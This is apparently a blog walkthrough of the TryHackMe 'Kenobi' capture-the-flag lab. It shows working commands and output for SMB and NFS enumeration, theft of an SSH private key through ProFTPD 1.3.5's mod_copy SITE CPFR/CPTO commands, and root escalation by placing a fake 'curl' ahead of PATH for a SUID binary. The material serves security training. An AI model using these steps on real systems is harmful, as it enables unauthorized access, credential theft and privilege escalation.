Kenobi is TryHackMe CTF on exploiting Linux machines through Samba, proftpd and privilege escalation through manipulation of PATH variables.

Task 1 – Deploy the vulnerable machine

1. Make sure you’re connection to our network and deploy the machine.

Connect to VPN, hit Deploy button.

2. Scan the machine with nmap, how many ports are open?

kali@kali:~/Desktop/TryHackMe/kenobi$ nmap 10.10.130.214
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 18:30 EDT
Nmap scan report for 10.10.130.214
Host is up (0.020s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs

Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds

Task 2 – Enumerating Samba for shares

1. Using nmap can enumerating a machine for SMB shares.

This is possible with a number of tools. Kenobi suggests using nmap’s SMB scripts however.

kali@kali:~/Desktop/TryHackMe/kenobi$ nmap -p 445 – script=smb-enum-shares.nse,smb-enum-users.nse 10.10.130.214
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 18:32 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Ping Scan Timing: About 100.00% done; ETC: 18:32 (0:00:00 remaining)
Nmap scan report for 10.10.130.214
Host is up (0.018s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.130.214\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.130.214\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.130.214\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds

2. On most distributions of Linux smbclient is already installed. Lets inspect one of the shares

kali@kali:~/Desktop/TryHackMe/kenobi$ smbclient //10.10.130.214/anonymous
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                9204224 blocks of size 1024. 6877092 blocks available

3. You can recursively download the SMB share too. Submit the username and password as nothing.

kali@kali:~/Desktop/TryHackMe/kenobi$ smbget -R smb://10.10.130.214/anonymous
Password for [kali] connecting to //anonymous/10.10.130.214: 
Using workgroup WORKGROUP, user kali
smb://10.10.130.214/anonymous/log.txt                                                        

Downloaded 11.95kB in 2 seconds
kali@kali:~/Desktop/TryHackMe/kenobi$ cat log.txt 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|           ..    |
|        . o. .   |
|       ..=o +.   |
|      . So.o++o. |
|  o ...+oo.Bo*o  |
| o o ..o.o+.@oo  |
|  . . . E .O+= . |
|     . .   oBo.  |
+----[SHA256]-----+

# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName                      "ProFTPD Default Installation"
ServerType                      standalone
DefaultServer                   on

# Port 21 is the standard FTP port.
Port                            21

# Don't use IPv6 support by default.
UseIPv6                         off

# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask                           022

# To prevent DoS attacks, set the maximum number of child processes
# to 30.  If you need to allow more than 30 concurrent connections
# at once, simply increase this value.  Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances                    30

# Set the user and group under which the server will run.
User                            kenobi
Group                           kenobi

.....

4. What mount can we see?

kali@kali:~/Desktop/TryHackMe/kenobi$ nmap -p 111 – script=nfs-ls,nfs-statfs,nfs-showmount 10.10.130.214; echo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-09 18:42 EDT
Nmap scan report for 10.10.130.214
Host is up (0.016s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 0.98 seconds

Task 3 – Gain initial access with ProFtpd

1. Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.

kali@kali:~/Desktop/TryHackMe/kenobi$ nc 10.10.130.214 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.130.214]

2. We can use searchsploit to find exploits for a particular software version. How many exploits are there for the ProFTPd running?

kali@kali:~/Desktop/TryHackMe/kenobi$ searchsploit -s proftpd 1.3.5
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ – – -------------------------------
 Exploit Title                                                                                                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ – – -------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                                                                               | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                                                                     | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                                                                                                                                                               | linux/remote/36742.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ – – -------------------------------

3. You should have found an exploit from ProFtpd’s mod_copy module.

Just hit complete after reading.

4. We’re now going to copy Kenobi’s private key using SITE CPFR and SITE CPTO commands.

kali@kali:~/Desktop/TryHackMe/kenobi$ nc 10.10.130.214 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.130.214]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/ida_rsa
250 Copy successful

5. Lets mount the /var/tmp directory to our machine

kali@kali:~/Desktop/TryHackMe/kenobi$ sudo mkdir /mnt/kenobiNFS
[sudo] password for kali: 
kali@kali:~/Desktop/TryHackMe/kenobi$ sudo mount 10.10.130.214:/var /mnt/kenobiNFS
kali@kali:~/Desktop/TryHackMe/kenobi$ ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Sep  9 18:54 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Sep  9 18:52 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www
kali@kali:/mnt/kenobiNFS/tmp$ cp ida_rsa /home/kali/Desktop/TryHackMe/kenobi/id_rsa
kali@kali:/mnt/kenobiNFS/tmp$ cd /home/kali/Desktop/TryHackMe/kenobi/
kali@kali:~/Desktop/TryHackMe/kenobi$ ls
id_rsa  log.txt
kali@kali:~/Desktop/TryHackMe/kenobi$ chmod 400 id_rsa 
kali@kali:~/Desktop/TryHackMe/kenobi$ ssh -i id_rsa kenobi@10.10.130.214
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ cat user.txt 

Task 4 – Privilege Escalation with Path Variable Manipulation

1. Find files with SUID bits.

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

2. Run the binary how many options appear?

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

3. Privesc by changing curl PATH variable to actually run /bin/sh, or at least the source of it. curl is used in /bin/menu, 1. status check.

kenobi@kenobi:~$ echo /bin/sh > curl
kenobi@kenobi:~$ chmod 777 curl
kenobi@kenobi:~$ export PATH=/tmp:$PATH 
kenobi@kenobi:~$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Wed, 09 Sep 2020 23:18:09 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

kenobi@kenobi:~$ mv curl /tmp/curl
kenobi@kenobi:~$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# whoami
root
# 

4. What is the root flag?

# cat /root/root.txt

Leave a Reply